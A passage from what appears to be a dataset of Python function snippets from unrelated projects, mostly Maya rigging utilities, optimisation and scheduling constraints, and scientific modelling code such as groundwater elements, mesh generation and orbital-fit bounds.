newChainsA:\n\n\t\t\t# get a list of new available sites in the provided chain\n\t\t\t# by setting depth -1, we will only add to components added last round\n\t\t\topenSites = makeSiteList(thisChain,typeB,depth-1)\n\t\t\t\n\t\t\t# make all the descendants from the current chain and append them to the pool\n\t\t\tif (n == 0) and (typeA['sym']): #if the starting binder is symmetric, no need to start chains at all its sites\n\t\t\t\tnewChainsB = newChainsB + fillSites(openSites,thisChain,typeB,-1)\n\t\t\telse:\n\t\t\t\tnewChainsB = newChainsB + fillSites(openSites,thisChain,typeB,depth)\n\t\t\n\t\tprint('n:'+str(n)+', '+str(len(newChainsB))+ ' chains created at depth '+str(depth))\n\t\t\n\t\tallChains = allChains + newChainsB\n\t\t\n\t\tdepth+=1\n\t\t\n\t\t# add an additional component to all the previously modified chains\n\t\tnewChainsA = []\n\t\tfor thisChain in newChainsB:\n\n\t\t\topenSites = makeSiteList(thisChain,typeA,depth-1)\n\t\t\tnewChainsA = newChainsA + fillSites(openSites,thisChain,typeA,depth)\n\t\t\t\n\t\tprint('n:'+str(n)+', '+str(len(newChainsA))+ ' chains created at depth '+str(depth))\n\t\t\n\t\tallChains = allChains + newChainsA\n\n\treturn allChains", "def constraints(self, x):\n pass", "def removeSkeletalConstraints(self):\n\n # get the joints created by this module and remove the constraints\n joints = self.returnCreatedJoints\n\n # create mover name\n networkNode = self.returnNetworkNode\n baseName = cmds.getAttr(networkNode + \".baseName\")\n\n for joint in joints:\n if cmds.objExists(joint + \"_mover_offset\"):\n cmds.select(joint)\n cmds.delete(constraints=True)\n\n else:\n jointBaseName = joint\n if self.name != baseName:\n nameData = self.name.split(baseName)\n\n if nameData[0] != \"\":\n jointBaseName = jointBaseName.partition(nameData[0])[2]\n if nameData[1] != \"\":\n jointBaseName = jointBaseName.partition(nameData[1])[0]\n\n if cmds.objExists(self.name + \"_\" + jointBaseName + \"_mover_offset\"):\n cmds.select(joint)\n cmds.delete(constraints=True)", "def _constraints_task_spread(self):\n # encourage scheduling a chunk for every 24 hours\n diag = util.blockdiag(self.num_timeslots, incr=tutil.SLOTS_PER_DAY)\n slots = diag.shape[0]\n\n def rule(model, p, j):\n \"\"\"\n For spread-activated tasks, this rule is used to encourage\n spreading the chunks out on multiple days.\n\n More precisely:\n S[i,j] = whether task j is assigned on day i\n\n Maximizing sum_i S[i,j] encourages spreading out the task chunks\n \"\"\"\n den = sum(diag[p, :])\n ind_i = model.timeslots\n total = sum(diag[p, i] * (\n model.A[i, j] + 2 * model.A2[i, j] + 3 * model.A3[i, j] + 4 *\n model.A4[i, j]) for i in ind_i)\n total /= den\n # Desired: S[i,j] = ceil(total)\n # Desired: S[i,j] = 0 if total <= 0; otherwise, S[i,j] = 1\n return -EPS, model.S[p, j] - total, 1 - EPS\n\n self.model.constrain_spread0 = Constraint(self.model.dayslots,\n self.model.tasks, rule=rule)\n\n def rule(model):\n den = self.num_tasks * slots\n num = 20\n weights = np.ones((7, self.num_tasks))\n for j in range(self.num_tasks):\n weights[:, j] = self.task_spread[j]\n total = summation(weights, model.S) / den * num\n return model.S_total == total\n\n self.model.constrain_spread1 = Constraint(rule=rule)", "def create_3d_patch(model,orgin,size,N,setname='default'):\n \n N = map(int,N)\n # create the coordinates and connectivity based on one\n bxyz,bcube = block3d(orgin,size,N)\n \n # add node to model starting with current highest node seq\n nn = int(model.node(bxyz))\n update_bcube = bcube + int(nn)\n \n pelemset = model.element(update_bcube,setname)\n \n \n nx = N[0] + 1\n ny = N[1] + 1\n nz = N[2] + 1\n \n \n nodeline = {}\n\n nodeline['1'] = [nn + 1]\n nodeline['2'] = [nn + 1 + ny*nz*(nx-1)]\n nodeline['3'] = [nn + 1 + ny*nz*(nx-1) + (ny-1)*nz]\n nodeline['4'] = [nn + 1 + nz*(ny-1)]\n nodeline['5'] = [nodeline['1'][0] + (nz-1)]\n nodeline['6'] = [nodeline['2'][0] + (nz-1)]\n nodeline['7'] = [nodeline['3'][0] + (nz-1)]\n nodeline['8'] = [nodeline['4'][0] + (nz-1)]\n \n nodeline['1-2'] = range(nodeline['1'][0],nodeline['2'][0]+1,ny*nz)\n nodeline['2-3'] = range(nodeline['2'][0],nodeline['3'][0]+1,nz)\n nodeline['3-4'] = range(nodeline['4'][0],nodeline['3'][0]+1,ny*nz)\n nodeline['1-4'] = range(nodeline['1'][0],nodeline['4'][0]+1,nz)\n\n nodeline['5-6'] = range(nodeline['5'][0],nodeline['6'][0]+1,ny*nz)\n nodeline['6-7'] = range(nodeline['6'][0],nodeline['7'][0]+1,nz)\n nodeline['7-8'] = range(nodeline['8'][0],nodeline['7'][0]+1,ny*nz)\n nodeline['5-8'] = range(nodeline['5'][0],nodeline['8'][0]+1,nz)\n \n nodeline['1-5'] = range(nodeline['1'][0],nodeline['5'][0]+1,1)\n nodeline['4-8'] = range(nodeline['4'][0],nodeline['8'][0]+1,1)\n nodeline['2-6'] = range(nodeline['2'][0],nodeline['6'][0]+1,1)\n nodeline['3-7'] = range(nodeline['3'][0],nodeline['7'][0]+1,1)\n \n nodeline['1-2-3-4'] = []\n nodeline['5-6-7-8'] = []\n nodeline['1-2-6-5'] = []\n nodeline['4-3-7-8'] = []\n nodeline['1-4-8-5'] = []\n nodeline['2-3-7-6'] = []\n \n for i in range(0,nx):\n for j in nodeline['1-4']:\n nodeline['1-2-3-4'].append(j + i*ny*nz)\n for j in nodeline['5-8']:\n nodeline['5-6-7-8'].append(j + i*ny*nz) \n \n for j in nodeline['1-5']:\n nodeline['1-2-6-5'].append(j + i*ny*nz) \n for j in nodeline['4-8']:\n nodeline['4-3-7-8'].append(j + i*ny*nz)\n \n for i in range(0,ny):\n for j in nodeline['1-5']:\n nodeline['1-4-8-5'].append(j + i*nz)\n for j in nodeline['2-6']:\n nodeline['2-3-7-6'].append(j + i*nz)\n #\n for key in nodeline:\n nodesetname = '-'.join([setname , key])\n model.nodeset(nodesetname,{'nodelist':nodeline[key]})\n\n return model", "def construct_network(self):\n r = 0\n n = self.nbr_0_splxs\n for k in range(n):\n self.splxs.append((0, (0, k)))\n self.nbr_splxs += 1\n r, edge = self.find_next_edge(r)\n # this while loop finds the new edge to treat and add it to the 1-splx list and then finds out if a 2-splx is created\n while edge != (-1, -1):\n # Add the new edge\n self.one_splxs.append((edge, self.nbr_splxs))\n self.splxs.append((1, self.nbr_1_splxs))\n self.nbr_1_splxs += 1\n self.nbr_splxs += 1\n self.dist_appearance.append(r)\n a, b = edge\n # find out if a 2-splx has been created\n for i in range(self.nbr_1_splxs - 1):\n c, d = self.one_splxs[i][0]\n if d == a:\n for j in range(i + 1, self.nbr_1_splxs - 1):\n e, f = self.one_splxs[j][0]\n if e == c and f == b:\n self.two_splxs.append((self.nbr_1_splxs - 1, i, j))\n self.splxs.append((2, self.nbr_2_splxs))\n self.nbr_2_splxs += 1\n self.nbr_splxs += 1\n self.dist_appearance.append(r)\n # find the next edge to treat\n r, edge = self.find_next_edge(r)\n print(\"Network created\")\n return ()", "def __init__(self, model, line, segments = None, influence = None, \r\n strength = 1, variables = [], priors=[]):\r\n\r\n import numpy as np\r\n from scipy.interpolate import interp1d\r\n import copy\r\n \r\n self.model = model\r\n model.elementlist.append(self)\r\n \r\n self.variables = variables\r\n self.priors = priors\r\n \r\n # ---------------------------------------------------------------------\r\n # Subdivide the provided no flow boundary into #segments pieces\r\n \r\n self.line_raw = copy.copy(line)\r\n \r\n if segments is None:\r\n \r\n self.segments = line.shape[0]-1\r\n \r\n else:\r\n self.segments = segments\r\n \r\n if self.segments < self.line_raw.shape[0]-1:\r\n \r\n raise Exception('Number of segments '+str(self.segments)+\" mustn't be smaller than number of line points \"+str(line.shape[0])+'.')\r\n \r\n if self.segments > self.line_raw.shape[0]:\r\n \r\n # Subdivide the line\r\n self.line = self.subdivide_line(line,self.segments)\r\n self.line_c = copy.copy(self.line[:,0] + 1j*self.line[:,1])\r\n else:\r\n \r\n self.line = self.line_raw.copy()\r\n self.line_c = self.line[:,0] + 1j*self.line[:,1]\r\n \r\n # Also get the normal vector components to each segment\r\n self.line_nvec = self.line[:,1] - 1j*self.line[:,0]\r\n self.line_nvec = self.line_nvec/np.abs(self.line_nvec)\r\n\r\n # --------------------------------------------------------------------- \r\n \r\n \r\n \r\n \r\n self.strength = np.ones(self.segments)*strength\r\n \r\n if influence is None:\r\n self.influence = self.model.domain_radius*2\r\n else:\r\n self.influence = influence\r\n \r\n \r\n self.Zi = []\r\n self.offset_outside = []\r\n self.L = []\r\n self.zc = []\r\n self.segment_nvec = []\r\n self.head_target = []\r\n \r\n for seg in range(self.segments):\r\n \r\n self.L += [np.abs(self.line_c[seg+1] - self.line_c[seg])]\r\n \r\n influence_pt = (self.line_c[seg+1]-self.line_c[seg])*self.influence/self.L[seg] + self.line_c[seg]\r\n Z = (2*influence_pt-(self.line_c[seg]+self.line_c[seg+1]))/(self.line_c[seg+1]-self.line_c[seg])\r\n self.Zi += [copy.copy(Z)]\r\n \r\n self.zc += [(self.line_c[seg]+self.line_c[seg+1])/2]\r\n \r\n # Calculate the normal vector to this segment\r\n self.segment_nvec += [(self.line_c[seg]-self.line_c[seg+1])]\r\n self.segment_nvec[-1]= [np.imag(self.segment_nvec[-1])-1j*np.real(self.segment_nvec[-1])]\r\n \r\n part1 = np.nan_to_num((Z+1)*np.log(Z+1))\r\n part2 = np.nan_to_num((Z-1)*np.log(Z-1))\r\n self.offset_outside += [self.L[seg] / (4*np.pi) * (part1 - part2)]\r\n \r\n # Convert list of segment centers to array\r\n self.zc = np.asarray(self.zc)\r\n \r\n \r\n # Check if the prior matches the number of parameters\r\n if len(self.priors) != len(self.variables):\r\n raise Exception('Number of priors must match number of unknown variables. Number of priors: '+str(self.priors)+' / Number of unknown variables: '+str(len(self.variables)))\r\n \r\n # Go through all elements\r\n if len(self.variables) > 0:\r\n # There are some model variables specified\r\n for idx,var in enumerate(self.variables):\r\n self.model.num_params += 1\r\n exec(\"self.model.params += [self.%s]\" % var)\r\n self.model.priors += [self.priors[idx]]\r\n self.model.variables += [var]\r\n if 'name' in list(self.priors[idx].keys()):\r\n self.model.param_names += [self.priors[idx]['name']] \r\n else: \r\n self.model.param_names += ['unknown']", "def __init__(self, model, line, segments = None,head_target = 0,\r\n variables = [], priors=[]):\r\n\r\n import numpy as np\r\n from scipy.interpolate import interp1d\r\n import copy\r\n \r\n # Append this element to the specified model\r\n self.model = model\r\n model.elementlist.append(self)\r\n model.linear_solver = True\r\n\r\n # ---------------------------------------------------------------------\r\n # Subdivide the provided no flow boundary into segments pieces\r\n \r\n # Complexify the line, if it wasn't already complex\r\n line = self.complexify(line)\r\n \r\n # The subdivision algorith requires the line coordinates as a real N-by-2 matrix\r\n line = np.column_stack((\r\n np.real(line)[:,np.newaxis],\r\n np.imag(line)[:,np.newaxis]))\r\n \r\n self.line_raw = copy.copy(line)\r\n if segments is None:\r\n self.segments = line.shape[0]-1\r\n else:\r\n self.segments = segments\r\n \r\n if self.segments < self.line_raw.shape[0]-1:\r\n raise Exception('Prescribed number of line segments '+str(self.segments)+\" mustn't be smaller than base number of segments \"+str(line.shape[0]-1)+'.')\r\n \r\n if self.segments > self.line_raw.shape[0]-1:\r\n \r\n # Subdivide the line\r\n self.line = self.subdivide_line(line,self.segments)\r\n self.line_c = self.line[:,0] + 1j*self.line[:,1]\r\n \r\n else:\r\n \r\n self.line = self.line_raw.copy()\r\n self.line_c = self.line[:,0] + 1j*self.line[:,1]\r\n \r\n # Also get the normal vector components to each segment\r\n self.line_nvec = self.line[:,1] - 1j*self.line[:,0]\r\n self.line_nvec = self.line_nvec/np.abs(self.line_nvec)\r\n\r\n # ---------------------------------------------------------------------\r\n \r\n # Get strength parameters for each vertex\r\n self.strength = np.ones(self.segments)\r\n \r\n \r\n self.zc = []\r\n self.segment_nvec = []\r\n self.L = []\r\n \r\n for seg in range(self.segments):\r\n \r\n self.zc += [(self.line_c[seg]+self.line_c[seg+1])/2]\r\n \r\n # Calculate the normal vector to this segment\r\n self.segment_nvec += [(self.line_c[seg]-self.line_c[seg+1])]\r\n self.segment_nvec[-1]= [np.imag(self.segment_nvec[-1])-1j*np.real(self.segment_nvec[-1])]\r\n \r\n self.L += [np.abs(self.line_c[seg+1] - self.line_c[seg])]\r\n \r\n self.zc = np.asarray(self.zc)\r\n \r\n # Extract target variables\r\n self.variables = variables\r\n self.priors = priors\r\n \r\n self.L = np.asarray(self.L)\r\n \r\n \r\n # Check if the prior matches the number of parameters\r\n if len(self.priors) != len(self.variables):\r\n raise Exception('Number of priors must match number of unknown variables. Number of priors: '+str(self.priors)+' / Number of unknown variables: '+str(len(self.variables)))\r\n \r\n # Go through all elements\r\n if len(self.variables) > 0:\r\n # There are some model variables specified\r\n for idx,var in enumerate(self.variables):\r\n self.model.num_params += 1\r\n exec(\"self.model.params += [self.%s]\" % var)\r\n self.model.priors += [self.priors[idx]]\r\n self.model.variables += [var]\r\n if 'name' in list(self.priors[idx].keys()):\r\n self.model.param_names += [self.priors[idx]['name']] \r\n else: \r\n self.model.param_names += ['unknown']", "def generate(pts):\n cmds.polyCreateFacet(name=\"shirt\", p=points)\n cmds.polyTriangulate()\n cmds.polySubdivideFacet(dv=SUBDIVISIONS)\n cmds.polyTriangulate()", "def _auto_influence(self, mod, rigid, pair_blend):\n\n constraint = rigid.sibling(type=\"rdConstraint\")\n\n # This is fine (but what does it mean? :O )\n if not constraint:\n return\n\n def bake_joint_orient(mat, orient):\n \"\"\"Bake jointOrient values\n\n Such that keyframes can be made without\n taking those into account. E.g. a joint with 0 rotate\n but 45 degrees of jointOrient should only require a key\n with 0 degrees.\n\n \"\"\"\n\n assert isinstance(mat, cmdx.om.MMatrix)\n assert isinstance(orient, cmdx.om.MQuaternion)\n\n mat_tm = cmdx.om.MTransformationMatrix(mat)\n new_quat = mat_tm.rotation(asQuaternion=True) * orient\n mat_tm.setRotation(new_quat)\n\n return mat_tm.asMatrix()\n\n transform = rigid.parent()\n\n joint_orient = self._cache[(transform, \"jointOrient\")]\n\n # pairBlend directly feeds into the drive matrix\n compose = mod.create_node(\"composeMatrix\", name=\"composePairBlend\")\n mod.connect(pair_blend[\"inTranslate1\"], compose[\"inputTranslate\"])\n mod.connect(pair_blend[\"inRotate1\"], compose[\"inputRotate\"])\n\n # A drive is relative the parent frame, but the pairblend is relative\n # the parent Maya transform. In case these are not the same, we'll\n # map the pairblend into the space of the parent frame.\n parent_rigid = constraint[\"parentRigid\"].connection()\n\n # Could be connected to a scene too\n if parent_rigid.type() != \"rdRigid\":\n return\n\n relative = mod.create_node(\"multMatrix\", name=\"makeRelative\")\n\n # From this space..\n parent_transform_matrix = rigid[\"inputParentInverseMatrix\"].asMatrix()\n parent_transform_matrix = parent_transform_matrix.inverse()\n\n # To this space..\n parent_rigid_matrix = parent_rigid[\"cachedRestMatrix\"].asMatrix()\n parent_rigid_matrix = parent_rigid_matrix.inverse()\n\n total_matrix = parent_transform_matrix * parent_rigid_matrix\n total_matrix = bake_joint_orient(total_matrix, joint_orient)\n\n mod.connect(compose[\"outputMatrix\"], relative[\"matrixIn\"][0])\n mod.set_attr(relative[\"matrixIn\"][1], total_matrix)\n\n mod.connect(relative[\"matrixSum\"], constraint[\"driveMatrix\"])\n\n # Keep channel box clean\n mod.set_attr(compose[\"isHistoricallyInteresting\"], False)\n mod.set_attr(relative[\"isHistoricallyInteresting\"], False)", "def cut_bonds_strain(xy, NL, KL, BM0, bstrain):\n NP, NN = np.shape(NL)\n BL = NL2BL(NL, KL)\n bL0 = BM2bL(NL, BM0, BL)\n BLtrim, bL0trim = cut_bonds_strain_BL(BL, xy, bL0, bstrain)\n KL = BL2KL(BLtrim, NL)\n # i2cut = (np.sqrt((xy[BL[:,0],0]-xy[BL[:,1],0])**2+(xy[BL[:,0],1]-xy[BL[:,1],1])**2) - bL0) < bstrain*bL0\n return KL, BLtrim, bL0trim", "def geminal_constraints(self, signatures, structure):\n\n # Identify all geminal pairs of signatures\n\n geminals = {(i, i.geminal) for i in signatures if i.geminal}\n\n # Iterate over geminals pairs of signatures\n\n for i, j in geminals:\n\n # Iterate over the domain of i\n\n for i_methyl in self.assignment_variables[i]:\n\n clause = [-self.assignment_variables[i][i_methyl]]\n\n # Should i be assigned to i_methyl, the clause we add\n # can only be satisfied if j is assigned to the geminal pair\n # of i_methyl\n\n for j_methyl in self.assignment_variables[j]:\n if i_methyl.geminal(j_methyl):\n clause.append(self.assignment_variables[j][j_methyl])\n\n # Add this clause to the formula\n self.add_clause(clause)", "def setup(self, proportion=False, maxmin=False):\n bounds = {}\n epsilons = {}\n\n # Maximize for super and minimize for Subinterval\n if maxmin:\n prob = pulp.LpProblem('SuperInterval LP', pulp.LpMaximize)\n else:\n prob = pulp.LpProblem('Max Subinterval LP', pulp.LpMinimize)\n\n # NOTE: Our LP requires each event to occur within a finite interval.\n # If the input LP does not have finite interval specified for all events, we want to set the setMakespan to MAX_FLOAT (infinity) so the LP works\n #\n # We do not want to run minimal network first because we are going to modify the contingent edges in LP, while some constraints in minimal network are obtained through contingent edges\n #\n # There might be better way to deal with this problem.\n # ##\n for (i, j) in self.stnu.edges():\n weight = self.stnu.get_edge_weight(i, j)\n if weight == float('inf'):\n self.stnu.update_edge_weight(i, j, MAX_FLOAT)\n\n # Store Original STN edges and objective variables for easy access. Not part of LP yet\n\n for i in self.stnu.nodes():\n bounds[(i, '+')] = pulp.LpVariable('t_%i_hi'%i, lowBound=0,\n upBound=self.stnu.get_edge_weight(0, i))\n\n lowbound = 0 if self.stnu.get_edge_weight(i, 0) == float('inf') else\\\n -self.stnu.get_edge_weight(i, 0)\n\n bounds[(i,'-')] = pulp.LpVariable('t_%i_lo'%i, lowBound=lowbound, upBound=None)\n\n self.add_constraint(bounds[(i, '-')] <= bounds[(i, '+')], prob)\n\n if i == 0:\n self.add_constraint(bounds[(i, '-')] == 0, prob)\n self.add_constraint(bounds[(i, '+')] == 0, prob)\n\n if i not in self.contingent_timepoints:\n self.add_constraint(bounds[(i, '-')] == bounds[(i, '+')], prob)\n\n if proportion:\n return (bounds, epsilons, prob)\n\n for (i, j) in self.constraints:\n if (i, j) in self.contingent_constraints:\n\n epsilons[(j, '+')] = pulp.LpVariable('eps_%i_hi' % j, lowBound=0, upBound=None)\n\n epsilons[(j, '-')] = pulp.LpVariable('eps_%i_lo' % j, lowBound=0, upBound=None)\n\n self.add_constraint(bounds[(j, '+')]-bounds[(i, '+')] ==\n self.stnu.get_edge_weight(i, j) - epsilons[(j,'+')], prob)\n self.add_constraint(bounds[(j, '-')]-bounds[(i, '-')] ==\n -self.stnu.get_edge_weight(j, i) + epsilons[(j, '-')], prob)\n\n else:\n # NOTE: We need to handle the infinite weight edges. Otherwise the LP would be infeasible\n upbound = MAX_FLOAT if self.stnu.get_edge_weight(i, j) == float('inf') \\\n else self.stnu.get_edge_weight(i, j)\n\n lowbound = MAX_FLOAT if self.stnu.get_edge_weight(j, i) == float('inf') \\\n else self.stnu.get_edge_weight(j, i)\n\n self.add_constraint(bounds[(j, '+')]-bounds[(i, '-')] <= upbound, prob)\n self.add_constraint(bounds[(i, '+')]-bounds[(j, '-')] <= lowbound, prob)\n\n return (bounds, epsilons, prob)", "def skeleton_buildDuplicateChain(self,sourceJoints = None, modifier = 'rig', connectToModule = False, connectAs = 'rigJoints', connectToSource = None, singleMode = False, cgmType = None, indices = [],blockNames=False):\n _str_func = 'skeleton_buildDuplicateChain'\n \n \n if indices:\n log.debug(\"|{0}| >> Indices arg: {1}\".format(_str_func, indices)) \n l_buffer = []\n for i in indices:\n l_buffer.append(sourceJoints[i])\n sourceJoints = l_buffer \n \n ml_source = cgmMeta.validateObjListArg(sourceJoints,mayaType=['joint'],noneValid=False)\n \n if connectToModule:\n #mRigNull = self.moduleTarget.rigNull\n \n #Get our segment joints\n if singleMode:\n l_jointsExist = connectToModule.getMessage(connectAs)\n else:\n l_jointsExist = connectToModule.msgList_get(connectAs,asMeta = False, cull = True)\n \n if l_jointsExist:\n log.debug(\"|{0}| >> Deleting existing {1} chain\".format(_str_func, modifier)) \n mc.delete(l_jointsExist)\n\n l_joints = mc.duplicate([i_jnt.mNode for i_jnt in ml_source],po=True,ic=True,rc=True)\n \n ml_joints = cgmMeta.validateObjListArg(l_joints,'cgmObject',setClass=True)\n \n if blockNames:\n l_names = skeleton_getNameDicts(self,False,len(l_joints)) \n else:\n l_names = []\n \n for i,mJnt in enumerate(ml_joints):\n if blockNames:\n _d_tmp = l_names[i]\n log.debug(\"|{0}| >> blockName dict {1} | {2}\".format(_str_func, i,_d_tmp)) \n for a in ['cgmIterator','cgmName']:\n if _d_tmp.get(a):\n mJnt.addAttr(a, str(_d_tmp.get(a)),attrType='string',lock=True)\n\n if modifier is not None:\n #l_names[i]['cgmTypeModifier'] = modifier\n mJnt.addAttr('cgmTypeModifier', modifier,attrType='string',lock=True)\n \n if cgmType is False:\n ATTR.delete(mJnt.mNode,'cgmType')\n elif cgmType:\n mJnt.addAttr('cgmType', cgmType,attrType='string',lock=True)\n \n #l_joints[i] = mJnt.mNode\n if connectToSource:\n mJnt.connectChildNode(ml_source[i].mNode,'sourceJoint',\"{0}Joint\".format(connectToSource))#Connect\n \n if mJnt.hasAttr('scaleJoint'):\n if mJnt.scaleJoint in ml_skinJoints:\n int_index = ml_source.index(mJnt.scaleJoint)\n mJnt.connectChildNode(ml_source[int_index],'scaleJoint','sourceJoint')#Connect\n\n #Name loop\n ml_joints[0].parent = False\n for i,mJnt in enumerate(ml_joints):\n #mJnt.rename(NAMETOOLS.returnCombinedNameFromDict(l_names[i]))\n mJnt.doName()\t\n \n if connectToModule:\n if singleMode:\n connectToModule.connectChildNode(ml_joints[0],connectAs,'rigNull')\n else:\n connectToModule.msgList_connect(connectAs, ml_joints,'rigNull')#connect\t\n log.debug(ml_joints)\n return ml_joints", "def make_bounds(coeffs_tuple, fix_coeffs, t=None, fix_coeffs_channels = None, normal = True,\n gaussian_priors = False, prior_params = None, coeffs_dict = None):\n\n if normal:\n if fix_coeffs_channels != None:\n fittable_coeffs_labels = [ key for key in coeffs_tuple if key not in fix_coeffs and key not in fix_coeffs_channels]\n else:\n fittable_coeffs_labels = [ key for key in coeffs_tuple if key not in fix_coeffs]\n\n bounds = [[-np.inf]*(len(fittable_coeffs_labels)), [np.inf]*(len(fittable_coeffs_labels))]\n\n if 't_secondary' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 't_secondary')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = t[0], t[-1]\n elif 't0' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 't0')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = t[0], t[-1]\n if 'rp' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'rp')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'fp' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'fp')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'a' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'a')\n ind = ind[0][0]\n bounds[0][ind]= 0.\n if 'inc' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'inc')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 180.\n if 'ecc' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'ecc')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'w' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'w')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 360.\n\n if gaussian_priors:\n for param in prior_params:\n ind = np.where(np.array(fittable_coeffs_labels) == param)[0][0]\n bounds[0][ind] = coeffs_dict[param] - coeffs_dict['{}_err'.format(param)]\n bounds[1][ind] = coeffs_dict[param] + coeffs_dict['{}_err'.format(param)]\n\n return bounds\n\n else:\n fittable_coeffs_labels = [ key for key in coeffs_tuple if key in fix_coeffs_channels]\n\n bounds = [[-np.inf]*(len(fittable_coeffs_labels)), [np.inf]*(len(fittable_coeffs_labels))]\n\n if 't_secondary' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 't_secondary')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = t[0], t[-1]\n elif 't0' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 't0')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = t[0], t[-1]\n if 'rp' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'rp')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'fp' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'fp')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'a' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'a')\n ind = ind[0][0]\n bounds[0][ind]= 0.\n if 'inc' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'inc')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 180.\n if 'ecc' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'ecc')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'w' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'w')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 180.\n\n if gaussian_priors:\n for param in prior_params:\n ind = np.where(np.array(fittable_coeffs_labels) == param)[0][0]\n bounds[0][ind] = coeffs_dict[param] - coeffs_dict['{}_err'.format(param)]\n bounds[1][ind] = coeffs_dict[param] + coeffs_dict['{}_err'.format(param)]\n\n return bounds", "def soft_selection_to_joint(*args):\n# TODO - check for selection of verts!\n selVtx = cmds.ls(sl=True, fl=True) # to get center for joint\n vtxs, wts = rig.get_soft_selection() # to get weights for jnt\n\n tform = vtxs[0].partition(\".\")[0]\n mesh = cmds.listRelatives(tform, s=True)[0]\n ptOnSurface = cmds.checkBoxGrp(widgets[\"jntCPOMCBG\"], q=True, v1=True)\n auto = cmds.checkBoxGrp(widgets[\"jntAutoCBG\"], q=True, v1=True)\n jntName = cmds.textFieldGrp(widgets[\"jntNameTFG\"], q=True, tx=True)\n rotOnSurface = cmds.checkBoxGrp(widgets[\"jntRotCBG\"], q=True, v1=True)\n\n cls = mel.eval(\"findRelatedSkinCluster \" + tform)\n if not cls:\n if auto:\n baseJnt, cls = rig.new_joint_bind_at_center(tform)\n else:\n cmds.warning(\"There isn't an initial bind on this geometry. Either create one or check 'auto'\")\n return()\n\n center = rig.average_point_positions(selVtx)\n rot = (0,0,0)\n if ptOnSurface:\n center = rig.closest_pt_on_mesh_position(center, mesh)\n if rotOnSurface:\n rot = rig.closest_pt_on_mesh_rotation(center, mesh)\n\n cmds.select(cl=True)\n jnt = cmds.joint(name = jntName)\n cmds.xform(jnt, ws=True, t=center)\n cmds.xform(jnt, ws=True, ro=rot)\n\n # add influence to skin Cluster\n cmds.select(tform, r=True)\n cmds.skinCluster(e=True, ai=jnt, wt=0)\n\n # apply weights to that joint\n for v in range(len(vtxs)):\n cmds.skinPercent(cls, vtxs[v], transformValue=[jnt, wts[v]])\n\n newName = rig.increment_name(jntName)\n cmds.textFieldGrp(widgets[\"jntNameTFG\"], tx=newName, e=True)\n\n return(jnt)", "def build_rig(self):\n\n # create rig part top nodes\n self.create_part_master()\n\n # Get all the relevant part info\n prefix = self.prefix\n options = self.options\n anim_ctrls = self.anim_ctrls\n bind_jnts = self.bind_joints\n hooks = self.hooks\n ctrl_grps = self.ctrl_grps\n jnt_grps = self.jnt_grps\n\n mirror = self.mirror_value\n\n parent = options.get('parent')\n squash_stretch = options.get('squashStretch')\n aimDownBone = options.get('aimDownBone')\n single_joint = options.get('singleJoint')\n number_joints = options.get('numberJoints')\n pickWalk_parent = options.get('pickWalkParent')\n\n # Create ctrls\n zeros, ctrls, offsets, last_nodes = [], [], [], []\n\n for i, ctrl_name in enumerate(anim_ctrls):\n zero, ctrl, offCtrls, last_node = self.anim_ctrl(ctrl_name)\n zeros.append(zero)\n ctrls.append(ctrl)\n offsets.append(offCtrls)\n last_nodes.append(last_node)\n\n #Setup pickwaliking attributes for the fingers\n i = 0\n ctrls.reverse()\n for ctrl in ctrls:\n\n if i+1 < len(ctrls):\n\n pickWalk.attribute_tag(ctrls[i],ctrls[i+1])\n else:\n pickWalk.attribute_tag(ctrls[i],pickWalk_parent)\n break\n\n i+=1\n ctrls.reverse()\n\n if len(ctrls) > 1:\n for i in range(1, len(ctrls), 1):\n mc.parent(zeros[i], last_nodes[i-1])\n\n # constraint jnts\n if len(bind_jnts) > 2:\n\n # point and aim/orient contraint all joints down the chain based on the\n for i in range(len(last_nodes)-1):\n mc.pointConstraint(last_nodes[i], bind_jnts[i], mo=1, n=bind_jnts[i]+'_pc')\n if not squash_stretch:\n mc.scaleConstraint(last_nodes[i], bind_jnts[i], mo=1, n=bind_jnts[i]+'_sc')\n\n if i < len(last_nodes)-1:\n print aimDownBone\n if aimDownBone:\n mc.aimConstraint(last_nodes[i+1],\n bind_jnts[i],\n aim=[mirror,0,0],\n u=[0,1,0],\n wu=[0,1,0],\n wut='objectRotation',\n wuo=last_nodes[i],\n mo=1, n=bind_jnts[i]+'_ac')\n if aimDownBone == False:\n mc.orientConstraint(last_nodes[i],bind_jnts[i],n=bind_jnts[i]+'_oc')\n\n #parent 